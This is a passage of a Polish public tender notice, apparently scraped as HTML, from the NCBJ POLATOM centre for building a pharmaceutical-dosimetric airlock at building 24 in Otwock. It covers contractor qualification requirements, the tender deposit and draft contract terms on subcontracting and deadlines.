wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, w celu potwierdzenia, że Wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych.c)	Załącznik Nr 7 - Wykaz dwóch zadań polegających na wykonaniu robót remontowo-modernizacyjnych o podobnym zakresie co przedmiot zamówienia, wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli czas prowadzenia działalności jest krótszy - w tym okresie, o wartości netto nie mniejszej niż 200 000,00 PLN (słownie: dwieście tysięcy złotych).Wykaz powinien zawierać daty, miejsca wykonania i nazwy podmiotów, na rzecz których roboty te zostały wykonane. Do wykazu należy załączyć dowody potwierdzające, że te roboty budowlane zostały wykonane należycie, w szczególności informacje o tym, że roboty zostały wykonane zgodnie z przepisami prawa budowlanego. Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie użyć tych dokumentów - inne dokumenty.d)	Załącznik Nr 4 - Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego zatrudnionych na umowę o pracę, w rozumieniu Kodeksu pracy - minimum 6 osób (pracownicy fizyczni), plus jedna osoba odpowiedzialna za kierowanie robotami budowlanymi wraz z informacjami na temat kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego.Uwaga: Osoba odpowiedzialna za realizację zamówienia (dotyczy osoby odpowiedzialnej za kierowanie robotami budowlanymi) powinna posiadać uprawnienia budowlane w podanych wyżej specjalnościach w rozumieniu Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r. poz. 1278) zgodnie z przepisami art. 104 ustawy z dnia 7 lipca 1994 r.. Prawo budowlane (Dz. U. z 2017 r. poz. 1529 z późn. zm.). ,,Osoby, które przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie." (zatem zakres uprawnień musi odpowiadać zakresowi robót objętych zamówieniem).Zamawiający uzna osoby, które posiadają uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994r. Prawo budowlane, uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego odpowiednie do realizacji przedmiotu zamówienia, do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie, jako spełniające przedmiotowy warunek.Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza, odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2008 r., Nr 63, poz. 394z późn. zm.).</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekaże Zamawiającemu oświadczenie (Załącznik nr 3), o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy Pzp. Wraz ze złożeniem oświadczenia o przynależności do grupy kapitałowej Wykonawca przekaże dowody, że powiązania z innym Wykonawcą składającym ofertę w niniejszym postępowaniu i należącym do tej samej grupy kapitałowej, o ile taka sytuacja będzie miała miejsce, nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Wykonawca zobowiązany jest wnieść wadium w wysokości 10 000,00 PLN (słownie: dziesięć tysięcy złotych) przed upływem terminu składania ofert.2. Wadium może być wniesione w:a)	pieniądzu,b)	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,c)	gwarancjach bankowych,d)	w gwarancjach ubezpieczeniowych,e) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2018 r. poz. 110).3. Wadium w formie pieniądza należy wnieść przelewem na konto w:Raiffeisen Bank Polska nr rachunku: 09 1750 0009 0000 0000 0347 9226 z dopiskiem na przelewie:Wadium w postępowaniu przetargowym:Nr sprawy 19/P/2018 ,,Wykonanie śluzy farmaceutyczno-dozymetrycznej przy części D bud. 24".Za skuteczne wniesienie wadium w pieniądzu uznaje się wpływ środków pieniężnych na rachunek bankowy Zamawiającego przed upływem terminu składania ofert. 4. Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:a)	pieniężnej - dokument potwierdzający dokonanie przelewu wadium został załączony do oferty,b)	innej niż pieniądz - oryginał dokumentu został złożony w oddzielnej kopercie w kasie NCBJ Ośrodek Radioizotopów POLATOM w budynku Nr 24 a jego kopia załączona do oferty.5. Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Pzp.6. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona.7. Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa art. 45 i 46 ustawy Pzp.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">§ 11. Zamawiający zleca a Wykonawca przyjmuje do wykonania roboty, które stanowią przedmiot zamówienia publicznego pn.: ,,Wykonanie śluzy farmaceutyczno-dozymetrycznej przy części D bud. 24" zgodnie z wymaganiami określonymi przez Zamawiającego w Specyfikacji Istotnych Warunków Zamówienia wraz z załącznikami, stanowiącymi integralną część niniejszej umowy, złożoną ofertą Wykonawcy, zasadami sztuki budowlanej oraz wiedzą i doświadczeniem.2. Przedmiotem zamówienia jest rozbiórka dobudówki i budowa śluzy komunikacyjnej przy bud. Nr 24 na terenie NCBJ na części działki nr ewidencyjny 17 w obrębie 257 w Otwocku. Realizacja zamówienia musi przebiegać zgodnie z etapami realizacji, określonymi w harmonogramie rzeczowo-finansowym stanowiącym Załącznik nr 8.do SIWZ.3. Wykonawca zobowiązuje się do wykonania przedmiotu niniejszej umowy z należytą starannością, zgodnie z obowiązującymi przepisami prawa, Polskimi Normami oraz do oddania przedmiotu niniejszej umowy Zamawiającemu w terminie w niej określonym.4. Wykonawca oświadcza, że posiada wszelkie wymagane przez przepisy prawa pozwolenia, uprawnienia i zezwolenia konieczne do wykonania przedmiotu niniejszej umowy. Oświadczenie to dotyczy również pracowników Wykonawcy, podwykonawców i dalszych podwykonawców zaangażowanych przez Wykonawcę w wykonanie przedmiotu niniejszej umowy.5. Wykonawca może zlecić podwykonawcom wykonanie całości lub części przedmiotu niniejszej umowy wyłącznie po zaakceptowaniu przez Zamawiającego umowy o podwykonawstwo - o ile przewidział w ofercie podwykonawstwo.6. Przed przystąpieniem do realizacji przedmiotu zamówienia w części, którą Wykonawca zamierza powierzyć podwykonawcy, Zamawiający wymaga przedstawienia mu, nie później niż 14 dni przed jej zawarciem, pisemnego projektu umowy z podwykonawcą (wskazanym w ofercie).W umowie tej należy zamieścić wykaz osób (pracowników podwykonawcy wraz ze stosownymi uprawnieniami), które będą wykonywać prace przy realizacji zamówienia, określić terminy zapłaty wynagrodzenia, które nie mogą być dłuższe niż 30 dni, liczone od dnia doręczenia Wykonawcy przez podwykonawcę faktur lub rachunków.7. Umowa o podwykonawstwo nie może zawierać:a) postanowień uzależniających uzyskanie przez podwykonawcę płatności od Wykonawcy od zapłaty przez Zamawiającego Wykonawcy wynagrodzenia obejmującego zakres robót wykonanych przez podwykonawcę,b) postanowień uzależniających zwrot podwykonawcy kwot zabezpieczenia przez Wykonawcę, od zwrotu zabezpieczenia wykonania umowy przez Zamawiającego Wykonawcy.8. Zamawiający w ciągu 3 dni może zgłosić zastrzeżenia do przedstawionego projektu umowy o podwykonawstwo, lub zaakceptować ją. Po akceptacji projektu umowy o podwykonawstwo, Wykonawca przedłoży poświadczony za zgodność z oryginałem odpis umowy o podwykonawstwo w terminie 7 dni od dnia zawarcia tej umowy. Jeżeli Zamawiający w terminie 3 dni od dnia przedłożenia umowy o podwykonawstwo, której przedmiotem są roboty budowlane, nie zgłosi w formie pisemnej sprzeciwu, uważa się, że zaakceptował tą umowę.9. Przystąpienie do realizacji robót przez podwykonawcę możliwe jest po akceptacji umowy o podwykonawstwo przez Zamawiającego. Przed rozpoczęciem robót podwykonawca jest zobowiązany poinformować o tym Zamawiającego i uzyskać od niego zgodę na przystąpienie do pracy.a) Wykonawca jest zobowiązany do każdorazowego przedkładania Zamawiającemu w terminie 7 dni od dnia zawarcia poświadczonych za zgodność z oryginałem odpisów zawartych umów o podwykonawstwo, których przedmiotem są dostawy lub usługi (przy robotach budowlanych), w celu weryfikacji, czy wskazane w nich terminy zapłaty wynagrodzenia nie są dłuższe niż 30 dni liczone od dnia doręczenia Wykonawcy faktur lub rachunków, z wyłączeniem umów o podwykonawstwo o wartości mniejszej niż 0,5% wartości umowy (wyłączenie nie dotyczy umów o podwykonawstwo o wartości większej niż 50 000,00 zł). Jeżeli termin zapłaty wynagrodzenia jest dłuższy niż 30 dni od dnia doręczenia Wykonawcy faktury lub rachunku, Zamawiający informuje o tym Wykonawcę i podwykonawcę i wzywa ich do zmiany tego terminu, w ciągu 7 dni, pod rygorem wystąpienia o zapłatę kary umownej. Niedokonanie zmiany w określonym przez Zamawiającego terminie pozbawia podwykonawcę tej umowy o podwykonawstwo uprawnienia do wystąpienia do Zamawiającego o bezpośrednią zapłatę należnego wynagrodzenia.b) W przypadku zmiany podwykonawcy lub wprowadzenia podwykonawcy nie wskazanego w ofercie, Wykonawca jest zobowiązany do dostarczenia Zamawiającemu do akceptacji kopii umów (których przedmiotem są roboty budowlane, dostawy, lub usługi) z podwykonawcami przed przystąpieniem podwykonawcy do realizacji tychże umów. Zasady i konsekwencje dotyczące dostarczania umów z podwykonawcami obowiązują jak w pkt. a).c) Wykonawca przedłoży, wraz z projektem umowy z podwykonawcą, odpis z Krajowego Rejestru Sądowego podwykonawcy lub inny dokument właściwy z uwagi na status prawny podwykonawcy, potwierdzający uprawnienia osób zawierających umowę w imieniu podwykonawcy do jego reprezentowania.d) Podwykonawca ma prawo do wystąpienia do Zamawiającego o dokonanie zapłaty bezpośredniej kwoty wynagrodzenia za prace określone w umowie o podwykonawstwo. Zasadność zapłaty wymaga akceptacji Wykonawcy i Zamawiającego.e) W przypadku dokonywania bezpośredniej zapłaty przez Zamawiającego kwoty wynagrodzenia należnego podwykonawcom, kwota ta zostaje potrącona z wynagrodzenia Wykonawcy, a brak zapłaty lub nieterminowa zapłata dla podwykonawcy przez Wykonawcę stanowi przesłankę do nałożenia kary umownej dla Wykonawcy. Powtarzające się, nieuzasadnione wstrzymywanie zapłaty należności przez Wykonawcę, jak również konieczność dokonywania bezpośrednich zapłat na sumę większą niż 5% wartości umowy w sprawie zamówienia publicznego może być podstawą do odstąpienia od umowy przez Zamawiającego.f) Bezpośrednia zapłata obejmuje wyłącznie należne wynagrodzenie, bez odsetek, należnych podwykonawcy. Zamawiający przed dokonaniem zapłaty umożliwia Wykonawcy zgłoszenie pisemnych uwag dotyczących zasadności bezpośredniej zapłaty wynagrodzenia podwykonawcy w terminie 7 dni od doręczenia takiej informacji.g) W przypadku zgłoszenia uwag przez Wykonawcę, Zamawiający może:?	nie dokonać bezpośredniej zapłaty wynagrodzenia podwykonawcy, jeżeli Wykonawca wskaże niezasadność takiej zapłaty,albo?	złożyć do depozytu sądowego kwotę potrzebną na pokrycie wynagrodzenia podwykonawcy w przypadku istnienia uzasadnionej wątpliwości Zamawiającego co do wysokości należnej zapłaty lub podmiotu, któremu płatność się należy,albo?	dokonać bezpośredniej zapłaty wynagrodzenia podwykonawcy, jeżeli podwykonawca wykaże zasadność takiej zapłaty.h) Zaakceptowane przez Zamawiającego umowy z podwykonawcami będą stanowiły załączniki do umowy w sprawie zamówienia publicznego z wyłonionym Wykonawcą.i) Pozostałe informacje dotyczące umów znajdują się w Dziale IV ustawy Pzp ,,Umowy w sprawie zamówień publicznych" art. 139-146.j) Przedstawienie Zamawiającemu przez Wykonawcę umów z podwykonawcami po upływie terminu określonego w niniejszym pkt 5 daje Zamawiającemu prawo do odstąpienia od umowy o realizację zamówienia z winy Wykonawcy.k) Zasady dotyczące podwykonawców mają odpowiednie zastosowanie do dalszych podwykonawców.l) Wykonawca ponosi pełną odpowiedzialność za wszelkie działania lub zaniechania własne, i podwykonawców.10. Wykonawca zobowiązuje się, że pracownicy wykazani w Załączniku nr 4 ,,Wykaz osób do realizacji zamówienia" będą w okresie realizacji niniejszej umowy zatrudnieni na podstawie umowy o pracę (minimum sześć osób) w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2014 r. poz. 15,2 z późn. zm.).11. Każdorazowo na żądanie Zamawiającego, w terminie wskazanym przez Zamawiającegonie krótszym niż 3 dni robocze, Wykonawca zobowiązuje się przedłożyć do wglądu zanonimizowane (niewidoczne dane osobowe pracowników) kopie umów o pracę zawartych przez Wykonawcę lub podwykonawcę z osobami (pracownicy fizyczni) biorącymi udział w realizacji zamówienia.12. Nieprzedłożenie przez Wykonawcę kopii umów pracowników fizycznych zatrudnionych przez wykonawcę/podwykonawcę zgodnie z ustępem powyżej będzie traktowane jako niewypełnienie obowiązku zatrudnienia pracowników biorących udział w realizacji zamówienia na podstawie umowy o pracę.13. Za niedopełnienie wymogu zatrudnienia pracowników biorących udział w realizacji zamówienia na podstawie umowy o pracę w rozumieniu przepisów Kodeksu pracy, Wykonawca zapłaci Zamawiającemu kary umowne w wysokości kwoty minimalnego miesięcznego wynagrodzenia za każdą osobę co do której nie dopełnił obowiązku zatrudnienia jej na umowę o pracę (za każdy miesiąc).§ 21. Wszelkie czynności, ustalenia i decyzje dotyczące wykonywania przedmiotu niniejszej umowy uzgadniane będą przez ustanowionego przedstawiciela Wykonawcy, wskazanego w Formularzu ofertowym (Załącznik nr 1 do SIWZ) z upoważnionym przedstawicielem Zamawiającego:.......................................................................................................................................................(imię i nazwisko przedstawiciela Zamawiającego wraz z kontaktowym numerem telefonu)2. W/w przedstawiciele są upoważnieni do składania i przyjmowania w imieniu odpowiednio Zamawiającego i Wykonawcy wszystkich wymaganych oświadczeń woli związanych z realizacją przedmiotu umowy, do prowadzenia negocjacji, uzgadniania i podejmowania decyzji w zakresie realizacji przedmiotu umowy, z wyjątkiem oświadczeń, które powodują konieczność dokonania zmiany umowy i które rodzą skutki finansowe powodujące przekroczenie kwoty wynagrodzenia za realizację przedmiotu umowy oraz oświadczeń powodujących zmianę terminu zakończenia umowy.§ 3Obowiązki stron:Do obowiązków Zamawiającego należy:o	wprowadzenie i protokolarne przekazanie Wykonawcy terenu prac,o	odbiór przedmiotu niniejszej umowy,o	terminowa zapłata należnego wynagrodzenia Wykonawcy.Do obowiązków Wykonawcy należy:o	zorganizowanie, zagospodarowanie oraz należyte zabezpieczenie, zwłaszcza przed dostępem osób trzecich, miejsca realizacji niniejszej umowy wraz z zapleczem,o	wykonanie i terminowe przekazanie Zamawiającemu do użytkowania przedmiotu niniejszej umowy,o	przekazanie dokumentacji powykonawczej i protokołu odbioru końcowego oraz uzyskanie dokumentu prawomocnego Pozwolenia na Użytkowanie.§ 41. Wykonawca oświadcza, że wykona i przekaże Zamawiającemu do użytkowania przedmiot niniejszej umowy zgodnie z wyznaczonym terminem do 30 kwietnia 2019 roku.2. Zmiana umownego terminu zakończenia przedmiotu niniejszej umowy jest możliwa na skutek działania siły wyższej, której zaistnienie lub skutki uniemożliwiają wykonanie umowy w terminie w niej wskazanym.3. Strona powołująca się na stan siły wyższej jest zobowiązana do niezwłocznego pisemnego powiadomienia drugiej Strony, a następnie do udokumentowania zaistnienia tego stanu. Po ustąpieniu przeszkód w realizacji niniejszej umowy, spowodowanych zaistnieniem siły wyższej, Strony ustalają nowy termin wykonania przedmiotu umowy. O ile stan siły 